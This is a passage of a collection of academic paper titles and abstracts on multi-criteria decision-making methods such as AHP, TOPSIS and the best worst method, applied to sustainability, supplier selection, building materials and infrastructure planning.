cooling demands (0.151) and energy management (0.091) and renewable energy (0.083) had the fourth and fifth ranks respectively. In the ranking weights of 17 sub-groups of energy saving technologies and solutions, the results of fuzzy analytic hierarchy process showed that efficient solutions for active space cooling (0.662) was as first rank, building insulation had the second rank with score (0.541) and third rank was European Eco-label for tourist accommodation service (0.532). --- paper_title: A supplier selection life cycle approach integrating traditional and environmental criteria using the best worst method paper_content: Abstract Supplier selection is a strategic decision that significantly influences a firm's competitive advantage. The importance of this decision is amplified when a firm seeks new markets and potentially a new supplier base. Recognizing the importance of these decisions, an innovative three-phase supplier selection methodology including pre-selection, selection, and aggregation is proposed. Conjunctive screening is used for pre-selection, the best worst method (BWM), a novel multiple criteria decision-making method is introduced for the selection phase. Material price and annual quantity are integrated with the decision at the aggregation phase. Qualitative, quantitative, traditional business, and environmental criteria are incorporated. The proposed methodology is applied within a food supply chain context, the edible oils industry. In this illustration the focal organization faces a global entry decision in a new international market. An extensive search is completed to identify the potential suppliers. Through initial screening a sub-set of qualified suppliers is identified. BWM is then used to find the best suppliers from among the qualified suppliers. Eventually the significance of the supplies in the aggregation phase is determined. The outcome is a relatively meaningful ranking of suppliers. The paper provides insights into the methodology, decision, and managerial implications. Study and model limitations, along with future research directions are described. --- paper_title: The Multi-Aspect Criterion in the PMADM Outline and Its Possible Application to Sustainability Assessment paper_content: Over the past few centuries, the process of decision-making has become more complicated in different respects. Since the initial phase of Multiple Criteria Decision Making (MCDM) around fifty years ago, Multiple Attribute Decision Making (MADM) has continued developing over the years as a sub-concept of MCDM. Noticeably, the importance of the decision-making process is increasingly expanding to such an extent that it necessarily blends into the undeniable processes of MADM actual models. Novel methods with different perspectives have been introduced considering the dynamic MADM concepts of time and future in classical frameworks; however, they do not overcome challenges in practice. Recently, Prospective MADM (PMADM) as a specific approach has presented future-oriented models using already known approaches of MCDM, and it has innovative items which show barriers of classic model of MADM. However, PMADM practically needs more conceptual bases to illustrate and plan the future of real decision-making problems. The Multi-Aspect Criterion is a new concept in mapping the future of the PMADM outline. In this regard, two examples of sustainability will be analyzed, and different requirements and aspects associated with PMADM will be discussed in this study. This new approach can support the PMADM outline in more detail and deal with a decision-making structure that can be considered as novel to industry experts. --- paper_title: Application of Structural Equation Modeling (SEM) to solve environmental sustainability problems: a comprehensive review and meta-analysis paper_content: Most methodological areas assume common serious reflections to certify difficult study and publication practices, and, therefore, approval in their area. Interestingly, relatively little attention has been paid to reviewing the application of Structural Equation Modeling (SEM) in environmental sustainability problems despite the growing number of publications in the past two decades. Therefore, the main objective of this study is to fill this gap by conducting a wide search in two main databases including Web of Science and Scopus to identify the studies which used SEM techniques in the period from 2005 to 2016. A critical analysis of these articles addresses some important key issues. On the basis of our results, we present comprehensive guidelines to help researchers avoid general pitfalls in using SEM. The results of this review are important and will help researchers to better develop research models based on SEM in the area of environmental sustainability. --- paper_title: NORMALIZED WEIGHTED GEOMETRIC BONFERRONI MEAN OPERATOR OF INTERVAL ROUGH NUMBERS – APPLICATION IN INTERVAL ROUGH DEMATEL-COPRAS paper_content: This paper presents a new approach to the treatment of uncertainty and imprecision in multi-criteria decision-making based on interval rough numbers (IRN). The IRN-based approach provides decision-making using only internal knowledge for the data and operational information of a decision-maker. A new normalized weighted geometric Bonferroni mean operator is developed on the basis of the IRN for the aggregation of the IRN (IRNWGBM). Testing of the IRNWGBM operator is performed through the application in a hybrid IR-DEMATEL-COPRAS multi-criteria model which is tested on real case of selection of optimal direction for the creation of a temporary military route. The first part of hybrid model is the IRN DEMATEL model, which provides objective expert evaluation of criteria under the conditions of uncertainty and imprecision. In the second part of the model, the evaluation is carried out using the new interval rough COPRAS technique. --- paper_title: An Overview of Multi-Criteria Decision-Making Methods in Dealing with Sustainable Energy Development Issues paper_content: The measurement of sustainability is actively used today as one of the main preventative instruments in order to reduce the decline of the environment. Sustainable decision-making in solving energy issues can be supported and contradictory effects can be evaluated by scientific achievements of multi-criteria decision-making (MCDM) techniques. The main goal of this paper is to overview the application of decision-making methods in dealing with sustainable energy development issues. In this study, 105 published papers from the Web of Science Core Collection (WSCC) database are selected and reviewed, from 2004 to 2017, related to energy sustainability issues and MCDM methods. All the selected papers were categorized into 9 fields by the application area and into 10 fields by the used method. After the categorization of the scientific articles and detailed analysis, SWOT analysis of MCDM approaches in dealing with sustainable energy development issues is provided. The widespread application and use of MCDM methods confirm that MCDM methods can help decision-makers in solving energy sustainability problems and are highly popular and used in practice. --- paper_title: Factors influencing consumers' intention to return the end of life electronic products through reverse supply chain management for reuse, repair and recycling paper_content: Resource depletion, population growth and environmental problems force companies to collect their end of life (EOL) products for reuse, recycle and refurbishment through reverse supply chain management (RSCM). Success in collecting the EOL products through RSCM depends on the customers’ participation intention. The objectives of this study are: (1) To examine the important factors influencing customers’ attitude to participate in RSCM; (2) To examine the important factors influencing customers’ subjective norm to participate in RSCM; (3) To examine the main factors influencing customers’ perceived behavioral control to participate in RSCM; (4) To examine the influence of attitude, subjective norms and perceived behavioral control on customers’ participation intention in RSCM. The Decomposed Theory of Planned Behaviour (DTPB) has been chosen as the underpinning theory for this research. The research conducted employed the quantitative approach. Non-probability (convenience sampling) method was used to determine the sample and data was collected using questionnaires. Partial Least Squares-Structural Equation Modeling (PLS-SEM) technique was employed. A total of 800 questionnaires were distributed among customers of electronic products in Malaysia. Finally, the questionnaire was distributed among the customers in electronic retailer companies based on convenience sampling method. The empirical results confirm that consumers perception about the risk associated with EOL electronic products, consumers’ ecological knowledge and relative advantages associated with reuse, repair and recycling can influence the attitude of consumers to return the EOL products for reuse, repair and recycling to producer. --- paper_title: How to understand and measure environmental sustainability: Indicators and targets paper_content: Abstract The concept of sustainable development from 1980 to the present has evolved into definitions of the three pillars of sustainability (social, economic and environmental). The recent economic and financial crisis has helped to newly define economic sustainability. It has brought into focus the economic pillar and cast a question mark over the sustainability of development based on economic progress. This means fully addressing the economic issues on their own merits with no apparent connection to the environmental aspects. Environmental sustainability is correctly defined by focusing on its biogeophysical aspects. This means maintaining or improving the integrity of the Earth's life supporting systems. The concept of sustainable development and its three pillars has evolved from a rather vague and mostly qualitative notion to more precise specifications defined many times over in quantitative terms. Hence the need for a wide array of indicators is very clear. The paper analyses the different approaches and types of indicators developed which are used for the assessment of environmental sustainability. One important aspect here is setting targets and then “measuring” the distance to a target to get the appropriate information on the current state or trend. --- paper_title: Preparing future engineers for challenges of the 21st century: Sustainable engineering paper_content: Abstract The field of engineering is changing rapidly as the growing global population puts added demands on the earth's resources: engineering decisions must now account for limitations in materials and energy as well as the need to reduce discharges of wastes. This means educators must revise courses and curricula so engineering graduates are prepared for the new challenges as practicing engineers. The Center for Sustainable Engineering has been established to help faculty members accommodate such changes through workshops and new educational materials, including a free access website with peer-reviewed materials. --- paper_title: A supplier selection life cycle approach integrating traditional and environmental criteria using the best worst method paper_content: Abstract Supplier selection is a strategic decision that significantly influences a firm's competitive advantage. The importance of this decision is amplified when a firm seeks new markets and potentially a new supplier base. Recognizing the importance of these decisions, an innovative three-phase supplier selection methodology including pre-selection, selection, and aggregation is proposed. Conjunctive screening is used for pre-selection, the best worst method (BWM), a novel multiple criteria decision-making method is introduced for the selection phase. Material price and annual quantity are integrated with the decision at the aggregation phase. Qualitative, quantitative, traditional business, and environmental criteria are incorporated. The proposed methodology is applied within a food supply chain context, the edible oils industry. In this illustration the focal organization faces a global entry decision in a new international market. An extensive search is completed to identify the potential suppliers. Through initial screening a sub-set of qualified suppliers is identified. BWM is then used to find the best suppliers from among the qualified suppliers. Eventually the significance of the supplies in the aggregation phase is determined. The outcome is a relatively meaningful ranking of suppliers. The paper provides insights into the methodology, decision, and managerial implications. Study and model limitations, along with future research directions are described. --- paper_title: Uncertainty analysis in the sustainable design of concrete structures: A probabilistic method paper_content: Abstract This paper presents a sustainability assessment model based on requirement trees, value analysis, the Analytic Hierarchy Process, and the Monte Carlo simulation technique. It embraces the approach for assessing sustainability taken by the Spanish Structural Concrete Code. Nevertheless, the deterministic model of the Spanish Code can cause significant problems in terms of adequately managing a project’s structural sustainability objective. Thus, a method not only has to assess the potential sustainability index at the end of the project. It also has to evaluate the degree of uncertainty that may make it difficult to achieve the sustainability objective established by the client or promoter. --- paper_title: The Location Selection for Roundabout Construction Using Rough BWM-Rough WASPAS Approach Based on a New Rough Hamy Aggregator paper_content: An adequately functionally located traffic infrastructure is an important factor in the mobility of people because it affects the quality of traffic, safety and efficiency of carrying out transportation activities. Locating a roundabout on an urban network is an imperative for road engineering to address traffic problems such as reduction of traffic congestion, enhancement of security and sustainability, etc. Therefore, this paper evaluates potential locations for roundabout construction using Rough BWM (Best Worst Method) and Rough WASPAS (Weighted Aggregated Sum Product Assessment) models. Determination of relative criterion weights on the basis of which the potential locations were evaluated was carried out using the Rough BWM method. In this paper, in order to enable the most precise consensus for group decision-making, a Rough Hamy aggregator has been developed. The main advantage of the Hamy mean (HM) operator is that it can capture the interrelationships among multi-input arguments and can provide DMs more options. Until now, there is no research based on HM operator for aggregating imprecise and uncertain information. The obtained indicators are described through eight alternatives. The results show that the fifth and sixth alternatives are the locations that should have a priority in the construction of roundabouts from the perspective of sustainable development, which is confirmed throughout changes of parameter k and with comparing to other methods in the sensitivity analysis. --- paper_title: Rank of green building material criteria based on the three pillars of sustainability using the hybrid multi criteria decision making method paper_content: Abstract A green building material (GBM) is an ecological, health-promoting, recycled, or high-performance building material that impacts the material selection to cover all three pillars (3Ps) of sustainability. The absence of clear instructions for GBMs and the difficulty of precision adjustments of GBM criteria with 3Ps sustainability make GBM selection a challenge. In addition, the consideration of all sustainability factors in GBM selection is a multi-criteria decision problem that requires mathematical techniques such as the multi criteria decision making (MCDM) method. This study applies a hybrid MCDM methodology to resolve multiple incompatible and conflicting GBM criteria to align with 3Ps sustainability. The Decision-Making Trial and Evaluation Laboratory (DEMATEL) was used to analyze the efficacy of and interrelationship between GBM criteria. This tool is a hybrid model using fuzzy analytic network process (FANP) for aligning and ranking GBM criteria based on 3Ps sustainability. Additionally, the study inspects four groups of professionals in Malaysia who involved in GBM selection and modified one of the oldest GBM criteria models considering the criteria identified from a comprehensive literature review. The results show that the relationship between GBMs and sustainability criteria are different based on the separate 3Ps of sustainability. The evaluation and results provide a valuable reference for building professionals to enhance sustainable construction through green materials. --- paper_title: Integrated sustainability assessment method applied to structural concrete columns paper_content: Abstract This research paper presents a general model for integral sustainability analysis of columns. This assessment tool has been obtained by using MIVES, a Multi-Criteria Decision Making (MCDM) model which considers the sustainability main plans (economic, environmental and social) and incorporates a value function concept in order to homogenize the indicators and consider the degree of satisfaction. This tool is general and could be applied to assess other structural components within the building sector after introducing minor changes. Nevertheless, for this research project, it has been designed to assess reinforced concrete columns in buildings in situ. Therefore, the influence of determining variables such as concrete compressive strength, cross-section geometry and building process have been studied based on this defined model. --- paper_title: Life cycle sustainability assessment (LCSA) for selection of sewer pipe materials paper_content: Sewer systems, over their life cycle, suffer deterioration due to aging, aggressive environmental factors, increased demand, inadequate design, third party intervention, and improper operation and maintenance activities. As a result, their state and overall long-term performance can be affected, which often requires costly and extensive maintenance, repair, and rehabilitation. Furthermore, these pressures can enhance the risk of failures (e.g., sewer leakage) which in turn can have serious impacts on the environment, public safety and health, economics, and the remaining service life of these assets. Effective asset management plans must be implemented to address long-term sustainability principles, i.e., economic growth, human health and safety, and environmental protection, simultaneously. The aim of this paper is to evaluate and compare four typical sewer pipe materials [i.e., concrete, polyvinyl chloride (PVC), vitrified clay, and ductile iron] and identify sustainable solutions. Two comprehensive life cycle sustainability assessment (LCSA) frameworks were applied. The first LCSA framework was based on the integration of emergy synthesis, life cycle assessment (LCA), and life cycle costing (LCC). In this framework, emergy synthesis has been applied to integrate the results from environmental analysis (i.e., LCA) and economic analysis (i.e., LCC) to an equivalent form of solar energy: a solar emergy joule. The second LCSA framework was based on a conventional, multi-criteria decision-making technique, i.e., the analytical hierarchy process, to integrate the results from environmental analysis (i.e., LCA) and economic analysis (i.e., LCC) and find the most sustainable solution over the sewer pipe life cycle. The results demonstrate that PVC pipe is the most sustainable option from both environmental and economic view points and can ensure a more sustainable sewer system. --- paper_title: Analyzing procurement route selection for electric power plants projects using SMART paper_content: AbstractThe decision of selecting the appropriate procurement/delivery system for large investment construction projects is a critical and challenging task for clients, and therefore a significant factor for the project's success. Complex projects as electric power plants can involve managing multiple contracts or subcontracts simultaneously or in sequence. The aim of this paper is to develop, and analyze a decision support tool to select the most efficient procurement/delivery system for multiple contracts Combined Cycle Power Plants (CCPP) constructed in Egypt and funded by the publicsector. This process involved the identification of various procurement routes, followed by the utilization of quantitative values developed in accordance with the requirements of the multi-criteria decision analysis technique known as simple multi-attribute rating technique (SMART). Results revealed that the procurement/delivery system with the highest score, for all contractual packages, is the integrated project delivery... --- paper_title: A multi-objective decision-support model for selecting environmentally conscious highway construction methods paper_content: AbstractThe construction industry has a considerable share in overall resource and energy consumption. Consequently, decision-makers try to achieve environmentally conscious construction by integrating environmental objectives into the selection of construction elements. Due to the complexity of construction projects, it is a known challenge to provide an effective mechanism to select the most feasible construction methods. Thus, it is crucial to learn the interdependency between various resource alternatives, such as material and equipment type, under various project conditions like unavailability of resources. An analytic network process (ANP) was used in this study to construct a decision model for selecting the most feasible construction method. Data collected via interviews with highway construction experts were used to model the dependency between decision parameters, such as project conditions and resource performance indicators. The proposed ANP model output the relative importance weights of deci... --- paper_title: MIVES multi-criteria approach for the evaluation, prioritization, and selection of public investment projects. A case study in the city of Barcelona paper_content: A meaningful contribution to the evaluation of heterogeneous public investments is described in this article. The proposed methodology provides a step towards sustainable urban planning in which decisions are taken according to clear, consistent and transparent criteria assisted by the MIVES multi-criteria analysis framework. The MIVES methodology combines multi-criteria decision making (MCDM) and multi-attribute utility theory (MAUT), incorporating the value function (VF) concept and assigning weights through the analytic hierarchy process (AHP). First, a homogenization coefficient is calculated to develop the Prioritization Index for Heterogeneous Urban Investments (PIHUI), so that non-homogenous alternatives may be comparable. This coefficient measures the need of society to invest in each public project through the consideration of its contribution to the regional balance, the scope of its investment, the evaluation of the current situation and the values of the city. Then, the MIVES multi-criteria framework is used to evaluate the degree to which each investment would contribute to sustainable development. Different economic, environmental and social aspects were considered through a decision framework, constructed with the three aforementioned requirements, five criteria and eight indicators. The case study conducted for the Ecology, Urban Planning and Mobility Area of Barcelona municipal council is presented in this article, showing how this method performs accurate, consistent, and repeatable evaluations. --- paper_title: Sustainability Evaluation Framework of Urban Stormwater Drainage Options for Arid Environments Using Hydraulic Modeling and Multicriteria Decision-Making paper_content: Stormwater drainage systems in urban areas located in arid environmental regions generally consist of storm-sewer networks and man-made ponds for the collection and disposal of runoff, respectively. Due to expansion in cities’ boundaries as a result of population growth, the capacity of existing drainage systems has been exhausted. Therefore, such systems overflow even during the smaller (than the design) return period floods. At the same time, changing rainfall patterns and flash floods due to climate change are other phenomena that need appropriate attention. Consequently, the municipalities in arid environmental regions are facing challenges for effective decision-making concerning (i) improvement needs for drainage networks for safe collection of stormwater, (ii) selection of most feasible locations for additional ponds, and (iii) evaluation of other suitable options, such as micro-tunneling. In this research, a framework has been developed to evaluate different stormwater drainage options for urban areas of arid regions. Rainfall-runoff modeling was performed with the help of Hydrological-Engineering-Centre, Hydrological-Modelling-System (HEC-HMS). To evaluate the efficacy of each option for handling a given design flood, hydraulic-modeling was performed using SewerGEMS. Meteorological and topographical data was gathered from the Municipality of Buraydah and processed to generate different inputs required for hydraulic modeling. Finally, multicriteria decision-making (MCDM) was performed to evaluate all the options on the basis of four sustainability criteria, i.e., flood risk, economic viability, environmental impacts, and technical constraints. Criteria weights were established through group decision-making using the Analytic Hierarchy Process (AHP). Preference-Ranking-Organization-Method for Enrichment-Evaluation (PROMETHEE II) was used for final ranking of stormwater drainage options. The proposed framework has been implemented on a case of Buraydah City, Qassim, Saudi Arabia, to evaluate its pragmatism. Micro-tunnelling was found to be the most sustainable option. --- paper_title: Experimental and analytical selection of sustainable recycled concrete with ceramic waste aggregate paper_content: Abstract This experimental and analytical investigation is conducted to develop a sustainable recycled concrete by incorporating ceramic waste as coarse aggregate. In order to achieve the designed goal, conventional aggregate is replaced by different amounts of ceramic waste aggregate. Fresh and hardened properties of conventional as well as ceramic waste aggregate concrete are assessed. Environmental impacts are also considered in terms of CO 2 footprints and consumption of volume of raw materials by concrete. Interfacial model is proposed at micro level to evaluate the behavior of ceramic waste and conventional aggregate with hydrated cement paste. Finally, sustainable concrete is selected which has the best performance with respect to compressive strength and environmental impacts. It is concluded that 30% partial replacement of ceramic waste aggregate with conventional aggregate provides the highest compressive strength, less environmental impacts and is selected as sustainable concrete, which is also verified by analytical hierarchy process (AHP) and technique for order preference by similarity to ideal solution (TOPSIS) --- paper_title: Industrial building design stage based on a system approach to their environmental sustainability paper_content: Abstract It is well known how the construction sector wields an enormous influence over economic activity, employment and growth rates. Further consideration still needs to be given to sustainability. Accordingly, an Integrated Value Model for Sustainable Assessment is presented in this article that applies a set of six study scopes to define the sustainability criteria of industrial buildings. Assignment of value functions to the sustainability criteria is then described in the context of a case study of a printing works, which demonstrates the effectiveness of this model at unifying both qualitative and quantitative indicators, in order to arrive at a specific “environmental sustainability index” for the industrial building. --- paper_title: Sustainability based-approach to determine the concrete type and reinforcement configuration of TBM tunnels linings. Case study: Extension line to Barcelona Airport T1 paper_content: Fibre-reinforced concrete (FRC) is a suitable alternative to the traditional reinforced concrete used in the manufacture of precast segments used to line tunnels excavated with a tunnel boring machine (TBM). Moreover, its use as a structural material has been approved by several national codes and by the current fib Model Code (2010). The use of FRC in segmental linings confers several technical and economic advantages, evidenced by the fact that structural fibres have been used to partially or entirely replace reinforcing bars in many TBM tunnels built over the past 20 years or currently under construction. FRC could also have been used in other tunnels, which are currently in the planning stage or under construction. However, despite its technical suitability and approval in current codes, the use of FRC was not possible in some cases. The impediment has sometimes been an incomplete understanding of the structural behaviour of the material, but a more general motive has been that comparisons of materials have taken into account only direct material costs and have not considered indirect costs or social and environmental factors. The aim of the present research is to develop a method for analysing the sustainability of different concrete and reinforcement configurations for segmental linings of TBM tunnels using the MIVES method (a multi-criteria decision making approach for assessing sustainability). This MCDM method allows minimising subjectivity in decision making while integrating economic, environmental and social factors. The model has been used to assess the sustainability of different alternatives proposed for manufacturing the segmental tunnel lining for the extension of the rail line of Ferrocarrils de la Generalitat de Catalunya (FGC) to Terminal 1 of El Prat Airport in Barcelona. --- paper_title: Multi-criteria evaluation model for the selection of sustainable materials for building projects paper_content: Sustainable material selection represents an important strategy in building design. Current building materials selection methods fail to provide adequate solutions for two major issues: assessment based on sustainability principles, and the process of prioritizing and assigning weights to relevant assessment criteria. This paper proposes a building material selection model based on the fuzzy extended analytical hierarchy process (FEAHP) techniques, with a view to providing solutions for these two issues. Assessment criteria are identified based on sustainable triple bottom line (TBL) approach and the need of building stakeholders. A questionnaire survey of building experts is conducted to assess the relative importance of the criteria and aggregate them into six independent assessment factors. The FEAHP is used to prioritize and assign important weightings for the identified criteria. A numerical example, illustrating the implementation of the model is given. The proposed model provides guidance to building designers in selecting sustainable building materials. --- paper_title: Multiple Criteria Decision Support System for Assessment of Projects Managers in Construction paper_content: Construction processes planning and effective management are extremely important for success in construction business. Head of a design must be well experienced in initiating, planning, and executing of construction projects. Therefore, proper assessment of design projects' managers is a vital part of construction process. The paper deals with an effective methodology that might serve as a decision support aid in assessing project managers. Project managers' different characteristics are considered to be more or less important for the effective management of the project. Qualifying of managers is based on laws in force and sustainability of project management involving determination of attributes value and weights by applying analytic hierarchy process (AHP) and expert judgement methods. For managers' assessment and decision supporting is used additive ratio assessment method (ARAS). The model, presented in this study, shows that the three different methods combined (ARAS method aggregated together with the AHP method and the expert judgement method) is an effective tool for multiple criteria decision aiding. As a tool for the assessment of the developed model, was developed multiple criteria decision support system (MCDSS) weighting and assessment of ratios (WEAR) software. The solution results show that the created model, selected methods and MCDSS WEAR can be applied in practice as an effective decision aid. --- paper_title: Construction method selection for green building projects to improve environmental sustainability by using an MCDM approach paper_content: Environmental pollution is a challenge being faced by construction companies. They attempt to solve these problems in order to improve the environmental sustainability of their green building projects by using different construction methods. However, the selection of the construction method for building projects involves a complex decision-making process. To solve this problem of construction method selection, this investigation presents a Multiple Criteria Decision Making (MCDM) approach. The study yields a comprehensive and systematic structure that employs quantitative assessments for priority construction method selection for each green building project and also aids construction companies with regard to their practical application. --- paper_title: Remedial Modelling of Steel Bridges through Application of Analytical Hierarchy Process (AHP) paper_content: The deterioration and failure of steel bridges around the world is of growing concern for asset managers and bridge engineers due to aging, increasing volume of traffic and introduction of heavier vehicles. Hence, a model that considers these heuristics can be employed to validate or challenge the practical engineering decisions. Moreover, in a time of increased litigation and economic unrest, engineers require a means of accountability to support their decisions. Maintenance, Repair and Rehabilitation (MR&R) of deteriorating bridge structures are considered as expensive actions for transportation agencies and the cost of error in decision making may aggravate problems related to infrastructure funding system. The subjective nature of decision making in this field could be replaced by the application of a Decision Support System (DSS) that supports asset managers through balanced consideration of multiple criteria. The main aim of this paper is to present the developed decision support system for asset management of steel bridges within acceptable limits of safety, functionality and sustainability. The Simplified Analytical Hierarchy Process S-AHP is applied as a multi criteria decision making technique. The model can serve as an integrated learning tool for novice engineers, or as an accountability tool for assurance to project stakeholders. --- paper_title: Evaluation of the requirement for passenger car parking spaces using multi-criteria methods paper_content: Abstract The present situation shows that the parking infrastructure in residential areas of Vilnius does not satisfy the existing level of motorization. Every evening people come home from work and end up parking cars on lawns, cycle and pedestrian paths, playgrounds, fire accesses and etc. In Lithuania, this problem emerged with the growing number of cars. There have been attempts to address parking shortage issues 20–30 years ago by building metal above-ground garages and underground car parks; but such solutions focused on existing burning needs alone. As a result, the current parking situation in residential areas is chaotic. This problem stems from the ineffectiveness of responsible institutions, which maintain the status quo. Consequently – as no car parking development projects are planned and implemented as well as no required statistical data is collected regarding conditions of car parking and etc. – people are forced to look for a solution by themselves, thus end up parking on lawns or playgro... --- paper_title: On the selection by MCDM methods of the optimal system for seismic retrofitting and vertical addition of existing buildings paper_content: Seismic retrofitting and vertical addition of existing buildings have been investigated.Different alternatives have been proposed for the two structural modification interventions.The TOPSIS MCDM method has been used for selecting the best alternative.Sensitivity analyses have proved the objectivity of the solutions found. In the current paper a novel procedure to select the optimal solution both for seismic retrofitting of existing RC buildings and for super-elevation of existing masonry constructions has been implemented by using three different Multi-Criteria Decision Making (MCDM) (TOPSIS, ELECTRE and VIKOR) methods.The procedure application has been faced with reference to two case studies.The first intervention has been studied on a real full-scale 3D RC structure retrofitted with different seismic protection devices mainly based on metal materials, whose performances were experimentally evaluated in a previous research project. All the applied MCDM methods have provided the same result, that is the dominating role exerted by aluminium shear panels for seismic retrofitting of the analysed structure.On the other hand, different innovative and traditional constructive systems have been examined to increase the number of floors of existing masonry buildings. The effectiveness of these interventions in improving the base building behaviour has been proved on a typical building of the South Italy. The study results, achieved by using the three MCDM methods inspected, have provided as an optimal solution the cold-formed steel systems thanks to their prerequisites of lightness, economy and sustainability. --- paper_title: Sustainability assessment for recreational buildings paper_content: ABSTRACTA large amount of natural resources and energy is wasted during and after the building construction process which might cause environmental problems such as climate changes. In order to achieve higher standards of environmental protection a range of building assessment systems has been established. However, they are mostly connected with the efficiency of an environmental protection and consumption of resources. Only few of them have limited possibilities to assess social and economic sustainability. A sustainable building includes aspects of environment, economy and society and therefore requirements to its assessment systems should be complex. We suggest that sustainability principles, that is, environmental, social and economic sustainability, should be estimated in the same equal weightings. The authors of this article created a model for assessing the sustainability for recreational buildings. Our model was created, in collaboration with experts, using breakdown, compensation and the analytic... --- paper_title: Upgrading the old vernacular building to contemporary norms: multiple criteria approach paper_content: AbstractSustainable development is emphasized in the process of construction or modernization of buildings at present. Old vernacular architecture does not satisfy contemporary building norms such as daylighting and/or thermal performance parameters. These parameters are important for sustainability due to their relation with energy savings. It is obvious that seeking to improve these parameters, old buildings should be upgraded. The main problem is how to reach contemporary building norms without a negative impact to architectural heritage in a process of modernisation. The aim of the research is to find the best compromise solution for effective vernacular architecture's change. The Authors suggest using multiple criteria approach that enables to evaluate possible alternative solutions in several controversial aspects and to find rational building's modernisation type. Also, suitability of combination of usual MCDM (Multiple Criteria Decision Making) methods with grey systems theory due to possibility o... --- paper_title: Cold-formed thin-walled steel structures as vertical addition and energetic retrofitting systems of existing masonry buildings paper_content: According to the current trend for sustainable constructions in urban areas, the present paper deals with the analysis of vertical addition systems for energetic retrofitting of existing masonry buildings. Starting from the current European (EN 1998-3:2005) and Italian (NTC 08) technical codes for the seismic assessment of existing structures, first a FEM model has been implemented to investigate the structural performances of masonry units with variable storeys (1, 2 and 3) and material strength (fk = 1, 3 and 6 MPa). Later on, traditional (reinforced concrete, masonry and steel) and innovative (glued laminated timber and cold-formed thin-walled steel) technologies have been proposed as a solution for vertical addition of the studied buildings. Therefore, a numerical campaign of linear dynamic analyses has been undertaken on the examined structures aiming at selecting the best vertical addition solution. The achieved numerical analysis results have provided cold-formed steel systems as the dominant solut... --- paper_title: Improving organizational learning by sharing information through innovative supply chain in agro-food companies from Bosnia and Herzegovina paper_content: Innovation is essential for long-term success in business and companies need to develop an innovative supply chain to respond to environmental and market challenges. It is necessary to develop knowledge through organizational learning in order to strengthen the ability of companies to innovate. An innovative supply chain is the basis for developing innovation in companies. To improve its market position companies should continuously receive high quality information from participants in the supply chain by sharing information. The complexity of relationships within supply chain affecting organizational learning is the subject of this study. We conducted an empirical study focusing our attention on agro-food companies in Bosnia and Herzegovina. A questionnaire was used as a data collection tool applying random systematic sampling and a total of 159 companies took part in this study. The empirical findings showed that sharing of information has a significant linkage with an innovative supply chain, but only in establishing partnerships with customers. We confirmed that an innovative supply chain is essential for development of organizational learning and agile supply chain. The findings could assist the managers of agro-food companies in Bosnia and Herzegovina to improve their business. This study provides guidance for improving business using supply chains. --- paper_title: A fuzzy multi criteria approach for measuring sustainability performance of a supplier based on triple bottom line approach paper_content: Abstract Sustainable supply chain management has received much attention from practitioners and scholars over the past decade owing to the significant attention given by consumers, profit and not-for-profit organizations, local communities, legislation and regulation to environmental, social and corporate responsibility. Sustainable supply chain initiatives like supplier environmental and social collaboration can play a significant role in achieving the “triple bottom line” of social, environmental, and economic benefits. Supplier selection plays an important role in the management of a supply chain. Traditionally, organizations consider criteria such as price, quality, flexibility, etc. when evaluating supplier performance. While the articles on the selection and evaluation of suppliers are abundant, those that consider sustainability issues are rather limited. This paper explores sustainable supply chain initiatives and examines the problem of identifying an effective model based on the Triple Bottom Line (TBL) approach (economic, environmental, and social aspects) for supplier selection operations in supply chains by presenting a fuzzy multi criteria approach. We use triangular fuzzy numbers to express linguistic values of experts' subjective preferences. Qualitative performance evaluation is performed by using fuzzy numbers for finding criteria weights and then fuzzy TOPSIS (Technique for Order Preference by Similarity to Ideal Solution) is proposed for finding the ranking of suppliers. The proposed approach is illustrated by an example. --- paper_title: Uncertain supply chain network design considering carbon footprint and social factors using two-stage approach paper_content: Sustainable development has become one of the leading global issues over the period of time. Currently, implementation of sustainability in supply chain has been continuously in center of attention due to introducing stringent legislations regarding environmental pollution by various governments and increasing stakeholders’ concerns toward social injustice. Unfortunately, literature is still scarce on studies considering all three dimensions (economical, environmental and social) of sustainability for the supply chain. An effective supply chain network design (SCND) is very important to implement sustainability in supply chain. This study proposes an uncertain SCND model that minimizes the total supply chain-oriented cost and determines the opening of plants, warehouses and flow of materials across the supply chain network by considering various carbon emissions and social factors. In this study, a new AHP and fuzzy TOPSIS-based methodology is proposed to transform qualitative social factors into quantitative social index, which is subsequently used in chance-constrained SCND model with an aim at reducing negative social impact. Further, the carbon emission of supply chain is estimated by considering a composite emission that consists of raw material, production, transportation and handling emissions. In the model, a carbon emission cap is imposed on total supply chain to reduce the carbon footprint of supply chain. To solve the proposed model, a code is developed in AMPL software using a nonlinear solver SNOPT. The applicability of the proposed model is illustrated with a numerical example. The sensitivity analysis examines the effects of reducing carbon footprint cap, negative social impacts and varying probability on the total cost of the supply chain. It is observed that a stricter carbon cap over supply chain network leads to opening of more plants across the supply chain. In addition, carbon footprint of supply chain is found to be decreased in certain extent with the reduction in negative social impacts from suppliers. The carbon footprint of the supply chain is found to be reduced with increasing certainty of material supply from the suppliers. The total supply chain cost is observed to be augmented with increasing probability. --- paper_title: Sustainable Supplier Management – A Review of Models Supporting Sustainable Supplier Selection, Monitoring and Development paper_content: In the last two decades, pressure from various stakeholders has forced many companies to establish environmental and social improvements both in their company and their supply chains. The growing number of journal publications and conference proceedings confirms this change also in academia. The aim of this paper is to analyse and review scientific literature on sustainable supplier management (SSM) with a focus on formal models supporting decision-making in sustainable supplier selection, monitoring and development. For this purpose, a framework on SSM is proposed and a comprehensive content analysis including a criteria analysis is carried out. Beyond this, in total 143 peer-reviewed publications between 1997 and 2014 have been analysed to identify both established and overlooked research fields. Major findings are the rapidly growing interest of this topic in academia in recent years, the predominance of Analytic Hierarchy Process, Analytic Network Process and fuzzy-based approaches, the focus on the f... --- paper_title: Developing a Green Supplier Selection Model by Using the DANP with VIKOR paper_content: This study proposes a novel hybrid multiple-criteria decision-making (MCDM) method to evaluate green suppliers in an electronics company. Seventeen criteria in two dimensions concerning environmental and management systems were identified under the Code of Conduct of the Electronic Industry Citizenship Coalition (EICC). Following this, the Decision-Making Trial and Evaluation Laboratory (DEMATEL) used the Analytic Network Process (ANP) method (known as DANP) to determine both the importance of evaluation criteria in selecting suppliers and the causal relationships between them. Finally, the VlseKriterijumska Optimizacija I Kompromisno Resenje (VIKOR) method was used to evaluate the environmental performances of suppliers and to obtain a solution under each evaluation criterion. An illustrative example of an electronics company was presented to demonstrate how to select green suppliers. --- paper_title: A decision support model for sustainable supplier selection in sustainable supply chain management paper_content: Selecting the most suitable sustainability criteria using questionnaire.Applying various statistical tests to validate the developed criteria.Developing an integrated FPP-FTOPSIS model for sustainable supplier 